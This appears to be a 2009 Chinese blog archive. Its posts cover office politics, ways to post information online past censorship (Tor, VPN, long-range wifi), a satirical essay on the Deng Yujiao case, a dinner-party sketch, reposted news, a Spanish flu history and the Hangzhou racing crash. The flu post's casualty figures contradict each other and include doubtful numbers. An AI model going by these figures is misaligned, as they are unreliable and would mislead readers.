许多有才能的员工,都会在繁琐的日常工作中沉没下去,慢慢变的毫无才能,没有生气,没有进取心,和刚到公司时的热情有天渊之别,极少的员工能保持旺盛的创造力,很少很少,甚至于没有。公司成长到一定规模,人浮于事,内部效率极低,运转成本极高,大量的钱哗哗地向外出着,却见不到明显的效益提升,这时的老板很难让普通员工理解,这时候内部管理层的斗争非常剧烈,人人都争着扩张自己的势力,原来的一点点工作,都会放大无数倍,觉的自己对公司做了多大的贡献,应该取得多少的回报。有谁会去想一想公司的发展,公司的发展呢?恐怕只剩下老板一个人在奋斗了。
大部分员工都是有良知、有热情,厌恶地看着眼前发生的一切,却毫无办法,从来不会有普通员工,找老板去倒倒苦水,只要一有苗头,主管会将这一切扼杀在萌芽状态;只要有任何威胁的动向,主管会比老板更敏感的觉察,并有所行动,强力地保护自己的权力地位免受影响。
在职场中,能混出来,人时地利人和,缺一不可,其实任何的成功都是一样,外面的世界更残酷,相比职场中的斗争,商海的斗争更是你死我活。在中国这样的环境里,经商进局子的风险都有,是真正的生存斗争。
晴朗的天,感觉今天状态特别好,和老宋在茶馆里聊了几个小时,对过去的许多东西看的更加透彻,虽然没有聊过去的事,也没有聊些八卦的东西,只是具体的业务上的几个看法,却分明的看清了过去的一些人和事。许多回忆又浮上来。
职场日记一
职场日记的回忆
虽然技术一直在进步,朋友一直在增多,但自己职业发展的路途,发生了重大的转变,08年我决定去冒险,是迫于形势所副无奈的选择。现在看,03年到08年,一直在痛苦和失败中度过。
从我的长处看,我的技术不错,甚至在某些方面可达到国内前列,业务也很精通,管理也有些经验,也很有人缘,为什么一直没提上去呢?传统的教育害了我啊,让我远离争权夺利,只要一有斗争,就跑的远远的,实际上这是对自己对公司的不负责。真正有才能的人,要去争取更高的职位,才能发挥更大的作用。要是自己不去争取,最后上去的都是善于勾心斗角却毫无才能,善于溜须拍马却从不干活的人,这样的人集中到了高管层,最后只会对公司对事业有害无益。自己最大的问题,就是没有任何争取,把这一切看在眼里,只顾在日记里发发牢骚,一直逆来顺受。
许多有才能的员工,都会在繁琐的日常工作中沉没下去,慢慢变的毫无才能,没有生气,没有进取心,和刚到公司时的热情有天渊之别,极少的员工能保持旺盛的创造力,很少很少,甚至于没有。公司成长到一定规模,人浮于事,内部效率极低,运转成本极高,大量的钱哗哗地向外出着,却见不到明显的效益提升,这时的老板很难让普通员工理解,这时候内部管理层的斗争非常剧烈,人人都争着扩张自己的势力,原来的一点点工作,都会放大无数倍,觉的自己对公司做了多大的贡献,应该取得多少的回报。有谁会去想一想公司的发展,公司的发展呢?恐怕只剩下老板一个人在奋斗了。
大部分员工都是有良知、有热情,厌恶地看着眼前发生的一切,却毫无办法,从来不会有普通员工,找老板去倒倒苦水,只要一有苗头,主管会将这一切扼杀在萌芽状态;只要有任何威胁的动向,主管会比老板更敏感的觉察,并有所行动,强力地保护自己的权力地位免受影响。
在职场中,能混出来,人时地利人和,缺一不可,其实任何的成功都是一样,外面的世界更残酷,相比职场中的斗争,商海的斗争更是你死我活。在中国这样的环境里,经商进局子的风险都有,是真正的生存斗争。
晴朗的天,感觉今天状态特别好,和老宋在茶馆里聊了几个小时,对过去的许多东西看的更加透彻,虽然没有聊过去的事,也没有聊些八卦的东西,只是具体的业务上的几个看法,却分明的看清了过去的一些人和事。许多回忆又浮上来。
2009年5月28日星期四
如何进行自己安全的通信
还有最近听说邓玉娇案的一些事,有些信息不能随便说的。
如何把自己想发的信息发布到网络上呢?下面提供几种技术方法:
1、使用HTTPS,比如gmail,可以使用https://www.gmail.com的方式访问,可以把信件提交给别人,或者直接发布到使用邮件更新的博客上。
2、使用tor等代理方式,tor支持https和udp,将需要发布的信息,转换为https和udp也是个好方式。
3、如果当时的网吧已经不能使用,建议使用上面两种方法。还有个简便的方法可以尝试一下,使用手机的彩信功能,可以附带图片和文字,非常方便。另外,手机上的通讯工具也有很多,大多还没有被监控过滤,用起来也非常方便。
4、自建基站,把远距离外的信号传输出来,可视距离内的wifi信号,可达到上百公里。现在农村装个锅,一般百十来块钱,用那种锅稍微改造一下,就可以实现长距离信号传输,而且可以传输在线视频信号,直接用电脑的摄像头信息,传输到外面来。
5、上面几种方法的原则,1是要建立自己的加密通信通道,2是要建立自己专用的通信通道。
所以,扩展开来。还有很多方法可以使用,大家集思广益吧。再接着提几种方法:
6、使用电话线,自建modem拨号,通过异地的代理服务器上网
7、使用电话线直接通讯,那种卡子似乎也不贵,网上有卖的。但在电脑城可能没有。可以传输几公里。
8、电力线传输,也有这种设备,适合小区内的通讯,经过变电站后,信号就衰减没了。
9、使用电台。使用电台进行语音通讯没有问题,但如何进行数据通讯,说实话我也没有实验过。但只要能进行语音通讯,我们就可以把声音编码成数据,使用变速变化的长短音进行编码,速度可能会极慢。
10、恩,6-9自建通讯链路,确实比较麻烦,必须改造现有的硬件。最快捷的方法,还是使用加密通讯链路的方法。恩,说了这么多,怎么没提应用最广泛的VPN呢?
失误啊失误,其实最好的办法,还是使用VPN,国外也有许多免费的VPN接入点,找找看吧。
另外,还有webos。
当然,最好的还是VPN,速度快,数据加密,再加上客户端的加密,基本就可以把被控制的信息传输出来吧。
忽切间想了这么几种方法,朋友问我的,不知道够不够用。要是你想到了更好的方法,别忘了告诉我一下。
2009年5月26日星期二
邓贵大是因公殉职
郑渊洁
2009年5月10日晚,湖北省巴东县数位国家公务员到一洗浴场所消费,女服务员邓玉娇将项目招商办主任邓贵大刺死。双邓案案发后全国众说纷纭。有说邓玉娇是在遭到邓贵大主任性侵犯后正当防卫。有说邓主任坐怀不乱,是小女子邓玉娇犯上作乱。
纵观林林总总,好像都忽视了一件事:邓贵大主任到该娱乐场所消费花的是公款还是自掏腰包?此细节看似事小,实乃为此案之关键所在。
倘若邓主任系公款消费,其身亡则应定性为因公殉职。公款消费等同于执行公务。邓主任下班后不顾疲劳,依然加班消费公款,说大了是为了本地经济招商引资陪同外商考察巴东投资环境。说小了是邓主任为了扩大内需身体力行。邓主任还可能是为了响应当地政府号召,肥水不流外人田。君不见湖北省公安县政府发文规定本县公务员只能抽本地产香烟。也可能邓主任所在县政府规定公务员只能在本地洗脚洗头洗浴洗身上一切能洗甚至见不得人也要让人见的部位。
鉴于当今到洗浴场所百分之八十五是公款消费这个比例,我们有理由相信邓贵大主任5月10日晚上是公款消费时遇袭身亡,因此,邓贵大属于因公殉职。
我们不能排除另一种可能:邓玉娇坚持要向国家公务员提供性服务,而邓主任身为国家公务员,觉悟极高,像爱护眼睛那样珍惜国家公务员的名誉和尊严,邓主任男足搭人墙阻挡敌方任意球那般捂住下身予以拒绝。邓玉娇恼羞成怒,图穷匕首见。如此,追认邓贵大为烈士就应该提上日程了。
还有一种可能我们也不能忽视:官场如战场。会不会有副主任想当主任想疯了,买凶刺杀邓主任?《潜伏》中我们党的地下工作者在妓院用割下头颅的方式严惩叛徒的场面给观众留下深刻印象。鉴于双邓案是在《潜伏》热播时发生,会不会有副手受此启发如法炮制?
双邓案有很多种可能,只有一种可能完全不可能:身为国家公务员的项目招商办主任邓贵大见到貌美的邓玉娇心起歹意,欲图谋不轨,邓玉娇正当防卫或者防卫过当。这种可能之所以不存在,是因为经过任职前公示的邓主任的国家公务员身份和觉悟在那摆着,否则他不可能领衔主任之要职。
邓玉娇必须严惩。否则今后国家公务员谁还敢去洗浴场所执行公务公款消费?袭警的事都有可能发生。国家公务员不敢去了,全国至少有百分之八十五的洗浴场所将倒闭,有多少姐妹会失业流落街头?为了姐妹们的饭碗,邓玉娇也应该大义凛然像她案发时投案自首那样主动申请英勇就义,和邓主任同时成为烈士。
双邓的烈士墓将成为巴东县项目招商办的新旅游资源。不是清明节也会全天候游人如织,财源滚滚。
2009年5月25日星期一
看电影《南京!南京!》
中国人没有抵抗吗?也有抵抗,尤其在安全区女人被强暴时,在灯下哗啦哗啦地打着麻将时,感觉对比真是强烈。在个人受到威胁时,在身边的亲人时受到威胁时,中国人在这时总会有最大的反抗,但可悲地却形不成力量,最后都倒在日本下的脚下了。一群士兵听到墙外面的机枪,顿时明白了处境,反抗着不听日本兵的口令,在不断射杀同伴的情况下,也端坐不动,却只有同一种命运,区别只在前后几分钟先死后死。这时的抗争,只有愤怒的呼喊,希望这赴死的声音,能传给未死的中国人,能抗争的更强烈些,反正是死,也要死的壮烈。
然而,镜头一转,刚刚哭泣的女人们,又躲在昏暗地楼里,窃笑着打起了麻将。当军人全部死去时,只余下任人宰割强暴的命运。
片子里没有强烈震慑人心的死亡场面,或许江边一片片的死亡,早就让人麻木了,看上去只是象大片的麦田倒了,没有血腥,没有动作片或恐怖片里的暴力,没有让人无法呼吸的恐怖,只有一望无际的死亡,一望无际的死亡。
30万人的死亡,在当时人口数量,基本就是屠城。杀戮,甚至让杀戮的机器,最终也变的迟钝了,也开始厌烦起来。这一切是怎么出现的?是丑恶的人性,还是罪恶的战争?
2009年5月23日星期六
饭局
老男人局,这个命名如果不出意外,出自老六之口,在老男人局里,老六就是"六核心",一群比他年纪更大的老男人围绕在老六周围,这些人召之即来,挥之不去。毕竟,辛苦了一阵子的老男人,可以利用饭局这种方式解解乏,舒活舒活口腔,它吸引人的并不是老六这张饱经沧桑且娇滴滴的脸,而是每个人都可以从他人身上制造一些快乐并让每一个人去分享。
昨天,一小撮人照例收到老六的短信:"春暖花开,万物复苏饭局,今晚在君琴花,时间18:30,请参战者庄严回复,嗯哼!"大概前段时间总是锣旗鼓不齐,饭局活动不多,把大家憋坏了。老六的通知发出去后,响应者甚众,老六开始担忧椅子是否告急,还好,来的人都能坐下了,紧密,零距离团结在张立宪的周围。
依旧是飘着酸汤猪蹄的酸味儿,依旧是大口喝酒的场面,酒过三巡,人们照例把焦点集中在土摩托身上,作为饭局的星外来客,每当人们想寻开心的时候,都会在土摩托身上寻找快乐灵感。土摩托是个好脾气,怎么说都不急,因为他知道自己说不过这些文科生。你说西医不好我没有异议,你说中医治病我不言语,只有默默的承受这一切,承受数不尽的春来冬去。一个外星人被我们活活练出了境界。土摩托知道火烧到自己的身上,端起酒杯笑了笑:"跟大家说件事。"每当他很严肃地这么开头,大家都会突然变得沉默,然后等待一个漫长的科学讲演,就是为了论述一个人们日常生活中的常见错误。当然,他说完之后还能引来更进一步的笑话升级。"这是我最后一次参加饭局,以后可能就不参加了。"罗老师把话接过来:"土老司,你想开点,真理总是握在少数人手里,你并不孤单。"土摩托笑了笑:"不是,后天我就回美国了,可能长期定居在美国。"
大家对土摩托没有传达他的科学观点感到有点不适应,我问:"你这有什么科学依据?"土摩托说:"02年我回国,呆了六七年,做了几个工作,《三联》给了我很大空间,但我想写的都写了,再发展也没什么突破了,决定回美国,也许环境变一下,能做出点什么。"全勇先老师说:"美国现在都这操性了,你回去干吗呀?""先干自己的本行,以前美国不允许搞干细胞研究,现在奥巴马允许了,我回去继续干我的本行。我回国能遇到你们这些人我很高兴,说实话,我没有想过我会跟你们这些人在一起混,我也不是你们想象的怪人,其实我也有忧伤,只是藏进了裤裆……我干了,大家随意。"土摩托从来都没有这样感性过,罗老师端起酒杯:"土老司,你进化了!"
于是饭局变得有些沉默。还是老六打破了沉默,"来吧,让我们为摩摩干一杯,希望他能好好研究一下,早日让桑兰站起来。"大家默默地喝了杯中酒,这时陈晓卿老师把话接过来:"土摩托正好你回美国了,我前些天也是思前想后,决定把陈乐送到美国念书。他妈的现在中国的教育环境越来越恶劣了,这孩子要是在中国这种环境,我真是教不好了,在家里我告诉他这么做是对的,在学校老师告诉他这么做是错的,陈乐很苦恼,常常跟我发牢骚,这么小的年纪就怀疑人生,长大了拧巴了怎么办?我干脆让他到国外念书吧,至少环境不同,对这孩子成长有点帮助。唉,一想陈乐要离开我,我真他妈舍不得,以前三天见不到孩子我就想,干什么都没心思,不知道他出国之后我该怎么办。"陈老师说着说着黑眼圈就红了。大家赶紧劝陈老师:"孩子小,出去能有出息,这对他是好事,舍不得孩子套不到狼。"陈老师哽咽了一下:"其实他能不能成材我不在乎,只要能成人就行,别回来跟土摩托一样,我就放心了。"要是平时,他说到这里大家会笑,但是这次大家都没笑,因为一种离别的愁绪萦绕在饭局的上空。
饭局上,小强老师照例背诵着电话号码,这时一个电话进来,他躲到一边接电话,两分钟后,小强老师入座,用他没有宾语的语法跟大家说:"其实,我也想说一个很重要的……下个月我就离开社科院了。""你要去哪儿?"小强老师说:"我调到新闻出版署期刊司工作了。"老六皱着眉头说:"物尽其用。"不知道小强这个移动的新闻出版署被绑定之后是否如鱼得水,对中国期刊出版是件好事还是坏事,但不管怎么说,小强老师变成体制内的人了。很难想象这个未曾说话先笑出来的人,进入体制后会变成什么嘴脸。老六又举起酒杯:"来吧,同志们,希望小强老师在新的工作岗位发挥余热,做好无间道工作。"
这时,和菜头老师来了。自从上次因为捍卫科学的纯洁,罗老师就跟和菜头闹翻了,俩人谁也不让步,但骨子里又都挺佩服对方的。大家看在眼里,记在心里。有时候这男人闹别扭跟六岁小孩闹别扭没有本质区别。老六安排这一历史性会面,让两个饭局"重量级"人物聚在一起,也是颇费一番苦心,搞不好场面会很尴尬,这男人啊,有时候比女人还需要哄。
老六站起来,说:"今天把和菜头老师跟罗老师招呼在一起,我没有抹稀泥的意思,你们俩谁要是呆不住就站起来走,道理我也不讲了,愿意的话,就走一个,以后你们想怎么样就怎么样。"现场很紧张,空气紧张的都在颤抖,当年泰森跟霍利菲尔德在拳击台上对峙的场面也不过如此。老六看了看他们,站起身说:"年轻人,现在国共都合作了,你们不至于比他们人品还差吧。"
罗老师站了起来,蛋面无表情,按我们理解的罗老师性格,他一定宁折不弯,佛袖而去。但见罗老师端起酒杯,说:"菜头,还记得我们最后一次通电话说了什么吗?"和菜头点了点他圆圆的和菜头,罗老师说:"就不说谁对谁错了,这事挺鸡巴没劲的。操,你还看什么啊?喝呀!"和菜头有点猝不及防,匆忙中随手端起一杯可乐,"我不喝酒了,用这个吧。"俩人象征性碰了一下。"讨厌,两个大男人,爽快点好不好,又不是第一次约会,矜持什么?"老六娇嗔道。有时候,相逢一笑泯恩仇就是一瞬间的事情。饭局的气氛活跃了许多,至于土摩托回美国的伤感事情,一瞬间就被人从内存清空了。
永远迟到的非非步和菜头的后尘来了,已经不再有人问她迟到的原因了,非非饭局迟到无非两个理由:找不到饭馆和路上塞车,比如君琴花,非非至少来过20次,每次都要打电话问怎么走。后来我发现,她每次都是从不同方向奔赴这个地点,只要方向一变,她肯定就迷路。人们都很羡慕非非,她把任何一成不变的东西变成崭新的去感受。
非非见到我第一句话就是:"王三表,我在南锣鼓巷开了一家店,你要在博客上帮我宣传一下。"要说非非就是不把我当外人,求我办事说话都那么蛮横。我说:"你的店叫什么名字?回头我去拍张照片,贴到博客上,说你这是无罩经营。"非非说:"叫'非卖品'。"您听这名字,"非卖品,肯定卖不动,而且工商税务肯定过几天就查抄。"
每次饭局,陈晓卿都固定给奶猪发短信,奶猪每次都无法参加,不过,以后奶猪可以经常性参加饭局活动了。我收到了奶猪的短信:"偶明天回北京,会一直常驻。"我回短信:"南瓜泡沫跟网易在北京养猪啦?"奶猪回:"从下周开始偶跟南瓜泡沫木关系鸟,去中影集团上班。"我回:"抑郁的不轻。"没想到啊,一个常在河边走的人,终于忍不住要跳河了,以后再也看不到奶猪的影评了,也就不知道什么电影不该看了。
都说现在不好找工作,我怎么就没看出来呢?
老六突然嚷嚷起来了:"哦,天哪,哦,天哪天哪,哦,天哪天哪天哪。"这时饭局所有目光的焦点,都集中在老六额头的两道直线。"怎么啦?"老六说:"一会杨大婶(老颓)进来的时候,你们不要惊讶。"我问:"到底怎么啦?你都惊讶到这个程度了,还不让我们惊讶。"老六说:"刚才大婶发短信,说马上就到。"嗨,以为老颓怎么了,大惊小怪。
十分钟后,老颓姗姗来迟。他进门那一刹,我相信每个人心中都会同时发出这样的声音:"哦,天哪,哦,天哪天哪,哦,天哪天哪天哪。"老颓已经剃度,穿着一身褐色僧袍,胸前挂着佛珠,见到大家,单手行礼:"各位好。"这时,王小山从桌子底下爬出来,见到老颓,用他短了半截的舌头说:"老颓你今天盛装出席啊?你怎么跟我一样剃光头?"老颓轻轻施了一礼:"本僧法号慧宜。"
其实我有点想乐,老颓的坛子脸剃掉头发之后,还别说,真有点富态,有点佛的感觉。其实早在几年前,老颓退休之后便潜心研究宗教佛法,我一直觉得,老颓是把佛法当成一个修心养性之道,或者当成一门学问。没想到他跳出尘世,皈依佛门。从此饭局便少了一个常委。
"咱说点高兴的事儿。"全勇先老师把话接过来,"今年哥们能火。昨天跟赵宝刚谈了一下,《奋斗2》剧本由我来写,石康写出的第一稿赵宝刚很不满意。""你丫真够二的。"陈晓卿说,"那种烂电视剧你也好意思写续集。"老全说:"哥们这几年混得有点背,就是挣点钱。"
老六半天没说话,一直坐在那里怀疑人生。他每次喝多都这样。但是这回他没怎么喝酒,一直像个交际花一样忙来忙去。他这时端起酒杯,"哥几个,我说两句,今天的饭局气氛有点不对,春天一到大家心事就比较多,我也有点心事,《读库》到年底我就不想办了。"
"为什么?"大家再次把目光集中在老六身上。"《读库》办了三年多,很多想法实现了,但是我实在感到很累,中国的图书发行环境不好,欠款不回,资金周转成了问题,在中国,实现一点理想的成本太高了。《读库》其实还算幸运的,但是现在我身体实在吃不消,不服老不行。我上周跟梁文道聊了一次,我觉得他接手《读库》比较合适,可以保证《读库》的质量。我退居二线,没事顾问一下就行了。而且我跟媳妇商量好了,找一个小地方颐养天年,这是我一直以来的理想。我在六盘水、六合、六安这几个地方斟酌了一下,决定明年去六安。"
老六想找个小地方生活的愿望由来已久,每次他在饭局上憧憬这种生活的时候,大家都觉得他在讲故事,没想到故事变成现实。唉,以后饭局少了一个核心,少了很多乐子。大家都有些无语,有时候,当有些东西马上要消失但还没消失并且你知道一定要消失,心情是最复杂的。
非非哭了,"六哥,你别离开北京。你可以一直在北京,你不参加饭局,王三表和陈猪头就会欺负我,这么多年你一直罩着我……"
这帮老男人,平时嘻嘻哈哈的,男人们最感性、最性情的一面总是被酒精冲淡,现在这种情绪释放出来,还真他妈让人受不了。
大家半晌无语。
这时,王小山从桌子底下爬上来,用他早已迷离的眼神费力聚焦半天,"哎,你们怎么了?都不说话?我刚才在下面听到了,没什么,有什么啊?我来说件让大家高兴的事儿,我五一结婚,大家到时候都去,谁也不许不去。"
陈晓卿说:"还就这件让你不开心的事儿,说出来挺让大家开心的。"
2009年5月21日星期四
中国这下牛大发了,量子政务网
http://news.xinhuanet.com/newmedia/2009-05/19/content_11398914.htm
看到后,马上发了好几条短信,并迅速打过电话来,说,是不是网络安全行业,要有一个新突破,要有大革命,我打开地址一看,就感觉悲剧了。
这个东东并不是没有价值,但显然外行人士让记者给误导了。看看这些关键词。。。。哎,悲哀啊悲哀
我把新闻都复制下来吧,省得大家去那个地方看了发笑。
安徽芜湖建成世界首个量子政务网 网络绝对保密
2009年05月19日 08:42:18 来源:中国新闻网
【字号 大 中 小】 【我要打印】 【我要纠错】 【Email推荐: 】
记者十八日在安徽芜湖采访获悉,世界上首个量子政务网在该市建成,并已投入试运行。据了解,量子政务网采用中国具有全部知识产权的单向量子保密通信方案和设备,以及量子保密通信网络核心组网技术,标志着中国量子保密通信技术已经正式步入应用轨道。
中国科学技术大学中科院量子信息重点实验室郭光灿院士介绍说,首期建成的芜湖"量子政务网",融合了国际上现有的三种组网技术,首次设计出具有多层次、旨在满足不同用户需求的多功能量子保密通信网络,通过该网络可以完成任意两点之间的绝对保密的通信过程,不仅可以实现保密声音、保密文件和保密动态图象的绝对安全通信,还能满足通信量巨大的视频保密会议和大量公文保密传输的需求。
量子保密通信技术基于量子力学原理,能确保两地之间密钥分配的绝对安全性,从而保证通信的绝对安全。量子信号在商用光纤上传输的不稳定性是量子保密通信技术实用化的主要技术障碍;而量子信号的绝对安全的路由问题则是实现量子通信网络的主要难题。因此,从根本上解决光纤传输的稳定性问题和光纤网络的量子路由问题一直是国际学术界的两大研究热点和难题。
据郭光灿介绍,早在二00四年,中科院量子信息重点实验室发明新型的光学干涉环,从根本上解决了光纤传输的稳定性问题,目前该技术方案已被国际量子密码研究的主要单位和公司广泛采用;而二00七年发明的量子路由器,解决量子信号在网络中自动寻址的难题,完成世界上首个无中转、任意互通的量子密码通信网络。
芜湖"量子政务网",是郭光灿院士和韩正甫教授所带领的团队与芜湖市政府合作的。其所使用的核心器件和设备,包括最关键的光电调制芯片,全部为中国自主研发或与国内单位联合研制,整个网络已经实现国产化。这一成果使中国具有全部知识产权的单向量子保密通信方案和设备,以及量子保密通信网络核心组网技术真正在实际工作中得以应用。
(胡胜友 吴兰)
2009年5月16日星期六
西班牙流感
第一次世界大战,人类陷入自相残杀之中,死亡者一千多万,成为人类历史上的一场浩劫。然而,就在这场浩劫快要结束的时候,一场流感的爆发夺去了2000万到4000万人的性命,这就是上世纪人们闻之色变的西班牙流感,或称1918年流感。今年10月5日,科学家研究发现,西班牙流感实际上就是禽流感的变异。
西班牙流感并不是从西班牙起源的,它最早出现在美国堪萨斯州的芬斯顿(Funston)军营中(1918年2月)。"西班牙流感"(SpanishLady)之所以得名是因为流感传到了西班牙,总共造成800万西班牙人死亡!!这次流感也就因此得名"西班牙流感"。
美国远征军把病菌带到欧洲
第一次世界大战中,世界处于大动乱、大改组,兵荒马乱、民不聊生,西班牙流感就在此背景下发生了。当时西班牙首先公布了流感疫情,故称之为西班牙流感。由于此次流感引起世界性大流行,发生在1918年故也称之为1918年流感。
这次流感是1918年2月首发于美国堪萨斯州的芬森军营。1918年3月11日午餐之前,军营一位士兵感到发烧、嗓子疼和头疼,就去部队的医院看病,医生认为他患了普通的感冒。然而,接下来的情况出人意料:到了中午,100多名士兵都出现了相似的症状。几天之后的周末,这个军营里已经有了500名以上的"感冒"病人。很快又传播至底特律等3个城市→3月美国远征军乘坐船带至欧洲前线→4月传播至法国军队,然后至英国和其他国家军队→5月达意大利、西班牙、德国、非洲,印度孟买和各尔各答→6月由英国远征军传播至英国本土,然后至俄罗斯、亚洲达中国、菲律宾、大洋洲至新西兰→1919年1月达澳大利亚,即不到一年时间席卷全球。
本次流感所造成的灾难是流感流行史上最严重的一次,也是历史上死亡人数最多的一次瘟疫,估计全世界患病人数在5亿以上,发病率约20%~40%,死亡人数达4000多万,比第一次世界大战战亡总人数还多。这次流感呈现出了一个相当奇怪的特征。以往的流感总是容易杀死年老体衰的人和儿童,这次的死亡曲线却呈现出一种"W"型――20到40岁的青壮年人这次也成为了死神追逐的对象。
西班牙国王也不能幸免
美国死亡人数50万,仅10月10日费城就有759人死于流感,西班牙800万人患病,包括国王阿方索三世在内,马德里三分之一市民受感染,一些政府部门被迫关门,电车停运;英国乔治五世也未幸免,英格兰和威尔士死亡达20万,皇家舰队三周无法入海,影响作战;印度孟买死亡700万;一些因纽特人村遭受灭顶之灾,有一村80人死于流感73人;20%的西萨摩亚人死于流感。许多国家尸体堆山;加拿大渥太华有轨电车没有乘客;学校,歌舞剧院,电影院无灯光,游泳池和保龄球馆空无一人;南非一个小镇由于缺乏棺木,毯子裹尸体草草下葬,白天满街出殡,夜晚救护车穿梭。
1918年西班牙流感也波及中国,3月始自广州直至东北,由上海至四川,蔓延广泛,北平警察患病过半,哈尔滨40%人被感染,学校停课,商店歇业。上海也出现过两个流行波。
翻阅资料,看到1918年11月6日上海《申报》的一篇报道,题为《救治时疫之布告》。报道全文刊登了当时定海县知事冯秉乾撰写的一份布告,是一首通俗的六言诗:
定邑城乡内外,近来疫症流行。
由于天时亢旱,井河饮料不清,
加以人民习惯,多不讲究卫生,
以致酿成疾病,性命危在俄顷。
民生疾苦如此,本县轸念殊深,
特与医家考证,厥病是为风瘟。
主治宜银翘散,有无咳嗽须分。
药味照方加减,初起服之极灵。
兹将各方列后,布告县属人民,
凡有患此病者,不及延请医生,
赶紧照方买药,连服自可安宁。
方药并非贵品,万勿吝惜钱文,
须知身命要紧,不可迷信求神,
妄食香灰神水,转致误害己身。
按照清洁方法,大家认真实行,
既于卫生有益,病患自然除根。
务望通人达士,解说不借口唇,
使彼无知乡愚,俾得一体遵循。
"风瘟"是中医对流感的称呼,"银翘散"为清代医家吴鞠通研制,是治疗流感的名方,可谓对症下药。
美国另一个研究小组也在《科学》杂志发表文章,他们已经在老鼠身上成功再造了1918年的病毒。他们发现的一些基因密码将有助于对下一次流感大流行做出预报和准备。
2009年5月15日星期五
超英赶美接轨国际 中国成品油价高美国2元
超英赶美接轨国际 中国成品油价高美国2元
2009年05月14日07:58
[我来说两句(1670)] [字号:大 中 小]
来源:海峡都市报 作者:昕颖
超英赶美,从上个世纪50年代末起就是我们的一个梦想。今天,我们猛然间发觉:成品油价格如果换算成美元已经超过美国了。
日前,国家发改委公布国内成品油调价机制,有关负责人在回答记者提问时说:与中东产油国和美国部分城市的价格相比,我国油价水平要高一些。
实际上,中国成品油价格已高于美国2元左右。从美国能源管理局网站上,我们非常清楚地找出目前美国的官方油价―――汽油价格1加仑200美分左右,1加仑相当于3.785升,若按照美元和人民币1比6.83的比价折算,那么美国汽油价格大概每升相当于人民币3.6元,而且是含税价。现在的97号汽油最高5.9元人民币,即使按每升高出美国2元人民币计算,也已经高出30%以上。
其实长久以来,中国的油价一直是有车一族最关心的问题之一,而从前几年开始较大幅度地对油价实行调整以及和国际接轨后,关于油价"涨快跌慢"的讨论声此起彼伏。
油价的涨跌涉及中国大量车友的切身利益,跌价当然得到实惠,涨价当然心怀不满,这都是人之常情可以理解。而油价的涨跌背后也确实是有复杂的综合因素,但是保持油价稳定,实现真正意义上的和国际接轨,不要每次调整油价都引来讨伐声一片也应该是目前的首重。
2009年5月11日星期一
杭州飙车撞车事件相关信息
在google搜索此肇事车辆信息 608Z0
可以找到1508个网页,信息很多。baidu可以找到1106个网页,可能给和谐掉一部分,不如google的搜索全面。
把马路当成F1赛道 富家子弟文二西路飙车
昨日20:27泽文何来电:文二西路西城广场往东一里路,有几个年轻人在飙车,一辆红色赛车,把一个路人撞死了。这个路人也是个小伙子,胳臂压得很难看,脑浆流了一地,刚刚120把人接走了,交警到了。现在围观的人很多,都在骂这个肇事者,他态度很差的,撞死人还不当一回事。
20:45林曦来电:文二西路紫桂花园门口,一辆改装的红色三菱跑车,撞死一个行人。
行人先被车头撞了,然后整个人飞起来撞到挡风玻璃,再飞出去。三菱车头凹了很大一块,挡风玻璃全碎了。人已经送走了,我拍了照片。
南都德加公寓的保安胡师傅说,出事地点在文二西路紫桂花园和德加公寓两个小区门之间的斑马线上。
交警听说胡师傅目击了车祸过程,带他到了斑马线旁,胡师傅手指斑马线,说开了――
晚上八点零几分样子,'轰轰轰'地跑来三辆车,都是很低很矮的跑车,速度很快很快。
有两辆车样子是差不多的,但是啥车,我没看清。还有一辆就是撞人的红色三菱。
被撞的那个小伙子当时是在过斑马线,不过当时我没看清是男是女。
人一下撞飞了起来,飞得很高很高,有那么高(胡师傅指了指德加公寓大门的门楣,门楣高约五米多)!人在空中翻了跟头,掉下来了。
一位紫桂花园的保安接着说:"开始我哪里以为会是人啊,撞飞得太高了!我以为是撞了车,保险杠什么的飞起来了呢!人掉下来后,离斑马线已经有20多米远了吧,当时刚好两个姑娘儿路过,一转脸,吓得抱头蹲了下来。"
一位黑衣女士说
夜里开开嘛,天还这么早,怎么好开的……
围观的路人纷纷指责,100码?150码都有了吧?不然人怎么可能撞得那么远?
撞人的红色三菱改装跑车,前牌照斜挂在一边,副驾驶位置的前挡风玻璃碎穿一个洞。
肇事司机是个小伙子,坐在旁边的警车里。他穿着POLO
T恤,右手戴一款运动型手表,右手臂上有一道弧形、约10厘米长的旧伤疤;他双手不停地盖着脸,不停地挤着前额,揉
着眼睛,偶尔通过手指缝看着外面的动静。
一个打扮时髦、脖上戴着粗粗金链子的小伙子,在三菱跑车旁打着电话,声音不大,很平静:"小×撞死人了,过来看看,文二西路这里。"
10多分钟后,陆续来了七八个打扮时髦的小伙子,有三四个小伙子或牵、或揽着漂亮女孩。他们慢慢围到一个40多岁、穿黑色套裙的女士周围。
这个中年女士面色焦虑地看路人们的指责,当看到有相机镜头对准坐在警车里的小伙子时,她上前打圆场说:"他年纪还小,你们手下留点情……"
但责骂的声音太多,黑衣女士的声音很快弱了下来。她抱肩退到旁边,任由别人议论。
七八个小伙子也跟着她走到一边,黑衣女士用杭州话对他们说话,大意是:夜里开开嘛,天还这么早,怎么好开的……
小伙子们在一旁出着主意:赶紧找找人,看看有啥路子,到底该怎么处理……
黑衣女士躲到了一边,不断按着号码,捂着嘴小声说着――直到三菱跑车被拖走,警车也开走了,她的电话还没打完,算了下时间,至少有40分钟。
闻讯赶来的七八个小伙子,一直等在旁边,拿出烟,各自点上火,大口吐着烟圈。
据查,这辆红色三菱车的车主是位女性,40多岁。
肇事三菱车上印着一家汽车俱乐部的网址
网站中说:这里聚集了国内顶尖的飘移赛车手
肇事的三菱跑车上印着两个网站的域名――www.fdschina.com和http://www.2008speed.com,尾灯处还印着"玩车坊"三个字。
离三菱跑车不远,停着几辆崭新的豪华车――英菲尼迪、保时捷、法拉利。
其中,保时捷跑车的车身侧面印着FDS CLUB――在肇事的三菱车引擎盖上也印着。
在FDS汽车俱乐部的网站首页上,最引人注目的是几段关于"激情、速度、渴望"的飙车视频画面:既有在城市里的,也有在野外空旷处的,具体地点看不出来,但取景地点肯定
不是杭州。
公司简介是这么介绍的:"极速飘移运动"。
服务项目的第一条便是:"挑战汽车飘移,体验F1赛道。""这里聚集了国内顶尖的飘移赛车手。他们作为中国飘移运动的第一批开拓者,在飘移运动的实践中,第一次提出了飘
移的核心内涵'弯道精神':永不放弃,超越自我。如果你也想和他们一样亲历赛场,挑战自我,那么FDS帮你实现梦想!"
在它的视频专栏里,只有一段视频,题目叫《公路狂飙之997T VS
SLR》,上面是这样介绍的:"当保时捷997T遇上迈凯轮SLR时,会毫不犹豫地全油门追上去!"
